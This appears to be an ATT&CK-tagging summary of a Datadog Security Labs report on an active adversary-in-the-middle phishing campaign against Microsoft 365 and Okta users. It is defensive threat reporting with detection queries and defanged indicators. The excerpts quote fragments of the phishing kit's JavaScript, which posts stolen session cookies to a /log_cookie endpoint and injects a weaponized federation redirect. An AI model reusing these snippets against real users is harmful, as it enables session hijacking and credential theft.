TTPwire Vol. 1 · MITRE ATT&CK-tagged


Datadog Security Labs

Investigating an adversary-in-the-middle phishing campaign targeting Microsoft 365 and Okta users

2025-12-10

ATT&CK techniques detected

19 predictions
T1539 Steal Web Session Cookie
99%
“any of the cookies is a "critical" one (session cookie), then exfiltrates it by sending a POST request to the /log_cookie endpoint: if (hasCritical && capturedUsername) { fetch('/log_cookie?company=' + encodeURIComponent(companyDomain), { method: 'POST',…”
T1566.002 Spearphishing Link
98%
“…Okta tenant and captures the victim’s credentials and session tokens. - We have witnessed a phishing email linked to this campaign being sent to hundreds of users and dozens of organizations in early December. - As of December 10, this campaign is still active. Analysis of a mo…”
T1566.002 Spearphishing Link
97%
“FederationRedirectUrl = weaponizedUrl; } Object.defineProperty(xhr, "responseText", { value: JSON.stringify(modifiedData), writable: false }); Object.defineProperty(xhr, "response", { value: modifiedData, writable: false }); Identifying initial access vecto…”
T1566.002 Spearphishing Link
97%
“may not redirect to the second-stage Okta phishing page depending on the victim tenants' configuration. The phishing emails/PDFs and domains use a specific lure around compensation, benefits, or salary. In this most recent iteration from December 2, 2025, the attacker’s ph…”
T1566.002 Spearphishing Link
96%
“Investigating an adversary-in-the-middle phishing campaign targeting Microsoft 365 and Okta users. Datadog has identified an active phishing campaign that targets organizations that use Microsoft 365 and Okta for their single sign-on (SSO) and is able to hijack the legit…”
T1566.002 Spearphishing Link
95%
“…MethodFirstType field mentioned above. source:okta @evt.name:user.authentication.verify @network.client.geoip.as.domain:cloudflare.com @target.displayName:*Okta*Dashboard* @debugContext.debugData.behaviors:(*device=POSITIVE* AND *location=PO…”
T1539 Steal Web Session Cookie
94%
“…The main goal of this script is to capture sensitive credentials and session cookies before and after the victim authenticates. First, it lists cookies that should be monitored and actively stolen. These correspond to Okta session cookies that are necessary to impersonate a us…”
T1566.002 Spearphishing Link
93%
“Okta federated users. While investigating Okta-related phishing pages, we identified a related set of Microsoft 365-themed phishing pages. These Microsoft 365 phishing pages proxy victim traffic to legitimate Microsoft endpoints to capture credentials and session cookies. Howe…”
T1539 Steal Web Session Cookie
82%
“(name.toLowerCase())) { capturedUsername = e.target.value; try { localStorage.setItem('okta_captured_username', e.target.value); sessionStorage.setItem('okta_captured_username', e.target.value); } catch (e) {} document.cookie = 'okta_capt…”
T1566.002 Spearphishing Link
80%
“…[.]io 511tactical.totalbenefitsportal[.]com mail.totalbenefitsportal[.]com totalbenefitsportal[.]com smtp.totalbenefitsportal[.]com ftp.totalbenefitsportal[.]com pop.totalbenefitsportal[.]com www.totalbenefitsportal[.]com benefitscloudportal[.]com s…”
T1111 Multi-Factor Authentication Interception
70%
“Investigating an adversary-in-the-middle phishing campaign targeting Microsoft 365 and Okta users. Datadog has identified an active phishing campaign that targets organizations that use Microsoft 365 and Okta for their single sign-on (SSO) and is able to hijack the legit…”
T1566.002 Spearphishing Link
64%
“the types of credentials available to authenticate the current user. {"Username": "victim@org.tld", "Display": "victim@org.tld", ... "Credentials": {"PrefCredential": 4, "HasPassword": true, "FederationRedirectUrl": "https://victim.okta.com/a…”
T1566.002 Spearphishing Link
60%
“…re affected. This section describes how to check if you've been affected by this phishing campaign. Within your Okta logs: if your organization is using Okta FastPass, the phishing attempt may populate in your logs through the user.authentication.auth_via_mfa event with the…”
T1555.003 Credentials from Web Browsers
54%
“io') && !url.includes('company=')) { const separator = url.includes('?') ? '&' : '?'; url += separator + 'company=<target>.okta.com'; } } options.credentials = 'include'; return originalFetch(url, options); }; The phishing page also injects i…”
T1566.002 Spearphishing Link
51%
“\/\/([^\.]+)\.(okta|oktapreview|okta-emea)\.com/i); if (oktaMatch) return oktaMatch[1]; var domainMatch = url.match(/https?:\/\/([^\/]+)/i); if (domainMatch) return domainMatch[1]; return null; }; var createWeaponizedUr…”
T1566.002 Spearphishing Link
50%
“and related IP addresses: spf=pass (sender IP is redacted) smtp.mailfrom=bounce.email.redacted; dkim=pass (signature was verified) header.d=email.redacted; dkim=pass (signature was verified) header.d=s1.y.mc.salesforce.com; dmarc=pass action=no…”
T1566.002 Spearphishing Link
46%
“paths of these first-stage phishing domains included a base64-encoded JSON object with metadata likely used to track the campaign and control access. The object contains information for tracking, such as campaign_id, session, ip, and id. It also contains entries to allow th…”
T1528 Steal Application Access Token
43%
“the types of credentials available to authenticate the current user. {"Username": "victim@org.tld", "Display": "victim@org.tld", ... "Credentials": {"PrefCredential": 4, "HasPassword": true, "FederationRedirectUrl": "https://victim.okta.com/a…”
T1566.002 Spearphishing Link
39%
“email. source:microsoft-365 @evt.name:MailItemsAccessed service:exchange @folders.folderItems.subject:("action required: review your 2026 salary & bonus information" OR thank?you,?*?\:*your?2026?compensation?package OR confidential\:?compensation?u…”

Summary

In this post, we investigate a recent phishing campaign that targets Microsoft 365 users.